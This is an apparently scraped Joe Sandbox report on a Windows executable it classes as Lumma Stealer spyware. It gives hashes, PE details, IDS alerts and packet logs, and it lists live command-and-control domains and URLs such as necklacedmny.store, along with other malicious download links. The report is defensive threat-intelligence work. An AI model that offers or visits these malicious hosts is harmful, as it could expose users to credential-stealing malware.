                                                        https://necklacedmny.store/api5file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://necklacedmny.store:443/apifile.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://necklacedmny.store/Kfile.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://necklacedmny.storefile.exe, 00000000.00000002.2176009298.00000000057F2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172310521.00000000057F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                188.114.96.3
                                                                		necklacedmny.storeEuropean Union
                                                                		13335CLOUDFLARENETUStrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1546005
                                                                Start date and time:2024-10-31 11:26:57 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 8s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:4
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:file.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 2
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target file.exe, PID 6764 because there are no executed function
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: file.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                06:27:49API Interceptor9x Sleep call for process: file.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                188.114.96.3VfKk5EmvwW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 083098cm.n9shteam.in/vmBase.php
                                                                Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • filetransfer.io/data-package/CEqTVkxM/download
                                                                0JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 977255cm.nyashkoon.in/secureWindows.php
                                                                zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                • touxzw.ir/alpha2/five/fre.php
                                                                QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • filetransfer.io/data-package/jI82Ms6K/download
                                                                9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                                DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                • www.globaltrend.xyz/b2h2/
                                                                transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • paste.ee/d/Gitmx

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                necklacedmny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                • 188.114.97.3

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUShttps://flaviarc.com/vrecord%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.3.157
                                                                Eprdtdrqbr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.177.220
                                                                Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                24602711 Inv_Or.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                MP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                hesaphareketi-01.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                • 104.26.12.205

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                a0e9f5d64349fb13191bc781f81f42e1Orden de compra.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                Orden de compra.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                • 188.114.96.3
                                                                Swift payment confirmation.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                • 188.114.96.3

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                No created / dropped files found

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):6.511131848851435
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:file.exe
                                                                File size:3'038'208 bytes
                                                                MD5:d6d4c4264450023d69bda4d017fe3771
                                                                SHA1:ce52488d60a985b5a6f66d87fd651a24945bba72
                                                                SHA256:3da9dc898a09a8c3f35ddcda206e53a2da0be374de54145f3acf6c0d146a72c8
                                                                SHA512:4f8579f85581d6e03b5281e7d871cd48484f08232d34361bd7ffa5fc710f201cc3739f50e7666aee702a4c1c7bb928ae35fd4b31effd93972438ffded707ce9d
                                                                SSDEEP:49152:18PziDvuWmtz6leocvB66CETDsfNtZRtpEiwTYmWeY74R:6iDvuWmtz6G6bTzeY74
                                                                TLSH:3DE549A2B50973CFD4CE17749967CEA6DD5C02F90B1088C39C2E647A7E67CC519BAC28
                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........p1...........@...........................1...........@.................................T...h..

                                                                File Icon

                                                                Icon Hash:00928e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x717000
                                                                Entrypoint Section:.taggant
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp 00007F1FDCDD7B8Ah

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                0x10000x580000x27e00128f08adcfcba3832723e4387ccab601False0.998114224137931data7.981720932479415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                hlkscldd0x5b0000x2bb0000x2ba200e246e1d9692bf4da7b5db1e3b0df5e3bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                rdxnvvje0x3160000x10000x4006001c67b225da1053312cda47a57ff0aFalse0.7919921875data6.128386280223348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .taggant0x3170000x30000x2200b95d91fddb9e4577d32dbcd50f5745a2False0.060546875DOS executable (COM)0.7581386604376292IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397

                                                                Imports

                                                                DLLImport
                                                                kernel32.dlllstrcpy

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-31T11:27:50.193064+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.5570981.1.1.153UDP
                                                                2024-10-31T11:27:50.209112+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.5604731.1.1.153UDP
                                                                2024-10-31T11:27:50.219788+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.5561361.1.1.153UDP
                                                                2024-10-31T11:27:50.243010+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.5526981.1.1.153UDP
                                                                2024-10-31T11:27:50.254410+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.5571121.1.1.153UDP
                                                                2024-10-31T11:27:50.935268+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549705188.114.96.3443TCP
                                                                2024-10-31T11:27:50.935268+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705188.114.96.3443TCP
                                                                2024-10-31T11:27:51.684144+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705188.114.96.3443TCP
                                                                2024-10-31T11:27:51.684144+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.96.3443TCP
                                                                2024-10-31T11:27:52.428175+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549706188.114.96.3443TCP
                                                                2024-10-31T11:27:52.428175+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706188.114.96.3443TCP
                                                                2024-10-31T11:27:52.922763+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706188.114.96.3443TCP
                                                                2024-10-31T11:27:52.922763+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706188.114.96.3443TCP
                                                                2024-10-31T11:27:53.818091+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549707188.114.96.3443TCP
                                                                2024-10-31T11:27:53.818091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707188.114.96.3443TCP
                                                                2024-10-31T11:27:55.282025+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549708188.114.96.3443TCP
                                                                2024-10-31T11:27:55.282025+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708188.114.96.3443TCP
                                                                2024-10-31T11:27:56.680878+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549709188.114.96.3443TCP
                                                                2024-10-31T11:27:56.680878+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709188.114.96.3443TCP
                                                                2024-10-31T11:27:58.356580+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549710188.114.96.3443TCP
                                                                2024-10-31T11:27:58.356580+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710188.114.96.3443TCP
                                                                2024-10-31T11:27:59.019842+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549710188.114.96.3443TCP
                                                                2024-10-31T11:28:00.140619+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549711188.114.96.3443TCP
                                                                2024-10-31T11:28:00.140619+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711188.114.96.3443TCP
                                                                2024-10-31T11:28:02.159347+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549712188.114.96.3443TCP
                                                                2024-10-31T11:28:02.159347+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712188.114.96.3443TCP
                                                                2024-10-31T11:28:07.028474+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549713TCP
                                                                2024-10-31T11:28:45.280437+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549912TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 31, 2024 11:27:50.318909883 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:50.318986893 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:50.319082022 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:50.320538998 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:50.320574045 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:50.935081959 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:50.935267925 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:50.969017982 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:50.969057083 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:50.969516993 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:51.017926931 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.185570002 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.185630083 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.185734987 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:51.684159994 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:51.684251070 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:51.684295893 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.699903965 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.699935913 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:51.699954033 CET49705443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.699959993 CET44349705188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:51.821034908 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.821074963 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:51.821136951 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.821474075 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:51.821484089 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.428025007 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.428174973 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.429413080 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.429425955 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.429677010 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.430932045 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.430977106 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.431006908 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.922769070 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.922837973 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.922868967 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.922899008 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.922924042 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.922929049 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.922952890 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.922983885 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.923008919 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.923261881 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.923321009 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.923363924 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.923371077 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:52.971076012 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:52.971106052 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.017949104 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.040117025 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.040219069 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.040251970 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.040306091 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.040324926 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.040363073 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.040376902 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.040411949 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.040693045 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.040704966 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.040750027 CET49706443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.040755033 CET44349706188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.216659069 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.216705084 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.216948986 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.217381954 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.217403889 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.817893982 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.818090916 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.847140074 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.847178936 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.847553015 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:53.848808050 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.848959923 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:53.848990917 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:54.573153019 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:54.573266029 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:54.573344946 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:54.573513031 CET49707443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:54.573535919 CET44349707188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:54.666923046 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:54.666968107 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:54.667063951 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:54.667359114 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:54.667373896 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.281821012 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.282025099 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:55.283858061 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:55.283869982 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.284132957 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.285382986 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:55.285588026 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:55.285628080 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.285696030 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:55.285703897 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.838068962 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.838320017 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:55.838466883 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:55.840552092 CET49708443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:55.840574026 CET44349708188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:56.064207077 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.064260960 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:56.064328909 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.064635992 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.064646959 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:56.680756092 CET44349709188.114.96.3192.168.2.5
